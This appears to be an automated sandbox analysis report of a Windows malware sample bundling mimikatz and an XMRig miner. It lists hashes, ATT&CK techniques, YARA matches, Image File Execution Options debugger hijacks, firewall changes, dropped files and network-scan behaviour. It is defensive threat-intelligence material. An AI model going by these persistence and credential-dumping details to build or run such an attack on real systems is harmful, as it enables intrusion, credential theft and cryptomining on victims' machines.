mimikatz | 3cf714b2e9bc968168c8f573dc8bce7500d2ebafa190610a1085e08e014f2285

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-01-2025 00:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
Size

10.4MB
MD5

08ec21231650ce1e9e2e34fa6b8d1c93
SHA1

77f7dd51f51885caf461b2e868ea5be7eb8d2357
SHA256

3cf714b2e9bc968168c8f573dc8bce7500d2ebafa190610a1085e08e014f2285
SHA512

386732dda87798e33584b37b8b6c68de78e642f8281f97bf64c29ff273bc149eb89e1f313c6026e48721786ce264f29be8255b395296741b910ce4f20551ab84
SSDEEP

196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2940 created 1076	2940	ejrscct.exe	19

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (24940) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/2056-190-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-198-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-224-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-226-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-227-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-228-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-232-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-256-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-495-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-497-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-752-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig
behavioral1/memory/2056-753-0x000000013F190000-0x000000013F2B0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 7 IoCs

resource	yara_rule
behavioral1/memory/592-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/memory/592-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/files/0x0008000000016d29-5.dat	mimikatz
behavioral1/memory/2472-9-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/memory/2176-136-0x000000013F0E0000-0x000000013F1CE000-memory.dmp	mimikatz
behavioral1/memory/2176-137-0x000000013F0E0000-0x000000013F1CE000-memory.dmp	mimikatz
behavioral1/memory/2940-165-0x0000000002E40000-0x0000000002F60000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ejrscct.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	ejrscct.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ejrscct.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2960	netsh.exe
2992	netsh.exe

Executes dropped EXE 18 IoCs

pid	Process
2472	ejrscct.exe
2940	ejrscct.exe
1220	wpcap.exe
1984	cqkgbschn.exe
2176	vfshost.exe
832	xohudmc.exe
1464	zmxrwm.exe
112	nehbuguun.exe
2056	dlgdbm.exe
2428	nehbuguun.exe
3004	nehbuguun.exe
2420	nehbuguun.exe
2752	nehbuguun.exe
2684	ejrscct.exe
1184	nehbuguun.exe
288	nehbuguun.exe
1716	ecskfpnbu.exe
3132	ejrscct.exe

Loads dropped DLL 24 IoCs

pid	Process
2004	cmd.exe
2004	cmd.exe
860	cmd.exe
1220	wpcap.exe
1220	wpcap.exe
1220	wpcap.exe
1220	wpcap.exe
1220	wpcap.exe
2784	cmd.exe
1984	cqkgbschn.exe
1984	cqkgbschn.exe
2220	cmd.exe
2220	cmd.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
1824	cmd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ifconfig.me
17	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	ejrscct.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\zmxrwm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\zmxrwm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ejrscct.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ejrscct.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	ejrscct.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	ejrscct.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019deb-132.dat	upx
behavioral1/memory/2176-136-0x000000013F0E0000-0x000000013F1CE000-memory.dmp	upx
behavioral1/memory/2176-137-0x000000013F0E0000-0x000000013F1CE000-memory.dmp	upx
behavioral1/files/0x000500000001a407-158.dat	upx
behavioral1/memory/2940-160-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/files/0x000500000001a45c-163.dat	upx
behavioral1/memory/2056-167-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2940-165-0x0000000002E40000-0x0000000002F60000-memory.dmp	upx
behavioral1/memory/112-171-0x000000013FEE0000-0x000000013FF3B000-memory.dmp	upx
behavioral1/memory/2428-177-0x000000013F980000-0x000000013F9DB000-memory.dmp	upx
behavioral1/memory/2428-179-0x000000013F980000-0x000000013F9DB000-memory.dmp	upx
behavioral1/memory/2940-184-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/memory/3004-188-0x000000013FCA0000-0x000000013FCFB000-memory.dmp	upx
behavioral1/memory/2056-190-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2940-192-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/memory/2420-196-0x000000013F460000-0x000000013F4BB000-memory.dmp	upx
behavioral1/memory/2056-198-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2940-200-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/memory/2752-204-0x000000013FF60000-0x000000013FFBB000-memory.dmp	upx
behavioral1/memory/2940-213-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/memory/1184-215-0x000000013F0F0000-0x000000013F14B000-memory.dmp	upx
behavioral1/memory/2940-218-0x00000000019F0000-0x0000000001A4B000-memory.dmp	upx
behavioral1/memory/288-222-0x000000013FB40000-0x000000013FB9B000-memory.dmp	upx
behavioral1/memory/2056-224-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-226-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-227-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-228-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-232-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-256-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-495-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-497-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-752-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx
behavioral1/memory/2056-753-0x000000013F190000-0x000000013F2B0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\bbbudkzem\UnattendGC\specials\spoolsrv.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\Corporate\mimidrv.sys	ejrscct.exe
File created	C:\Windows\gebuasnt\docmicfg.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\ecskfpnbu.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\trfo-2.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\tucl-1.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\ucl.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\spoolsrv.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\docmicfg.xml	ejrscct.exe
File created	C:\Windows\gebuasnt\vimpcsvc.xml	ejrscct.exe
File created	C:\Windows\ime\ejrscct.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\ip.txt	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\scan.bat	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\schoedcl.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\AppCapture64.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\upbdrjv\swrpwe.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\docmicfg.exe	ejrscct.exe
File created	C:\Windows\gebuasnt\schoedcl.xml	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\vimpcsvc.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\Corporate\mimilib.dll	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\ejrscct.exe	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\libeay32.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\wpcap.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\docmicfg.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\posh-0.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\xdvl-0.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\svschost.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\vimpcsvc.xml	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\spoolsrv.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\Packet.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\spoolsrv.exe	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\docmicfg.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\exma-1.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\svschost.xml	ejrscct.exe
File opened for modification	C:\Windows\bbbudkzem\eupselbrp\Result.txt	ecskfpnbu.exe
File created	C:\Windows\gebuasnt\ejrscct.exe	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
File created	C:\Windows\bbbudkzem\eupselbrp\cqkgbschn.exe	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\libxml2.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\trch-1.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\svschost.exe	ejrscct.exe
File opened for modification	C:\Windows\bbbudkzem\Corporate\log.txt	cmd.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\crli-0.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\vimpcsvc.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\schoedcl.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\AppCapture32.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\Corporate\vfshost.exe	ejrscct.exe
File opened for modification	C:\Windows\bbbudkzem\eupselbrp\Packet.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\coli-0.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\ssleay32.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\zlib1.dll	ejrscct.exe
File created	C:\Windows\gebuasnt\svschost.xml	ejrscct.exe
File created	C:\Windows\gebuasnt\spoolsrv.xml	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\svschost.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\eupselbrp\wpcap.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\cnli-1.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\tibe-2.dll	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\specials\vimpcsvc.exe	ejrscct.exe
File opened for modification	C:\Windows\gebuasnt\schoedcl.xml	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\Shellcode.ini	ejrscct.exe
File created	C:\Windows\bbbudkzem\UnattendGC\schoedcl.xml	ejrscct.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2924	sc.exe
1176	sc.exe
2944	sc.exe
1208	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zmxrwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
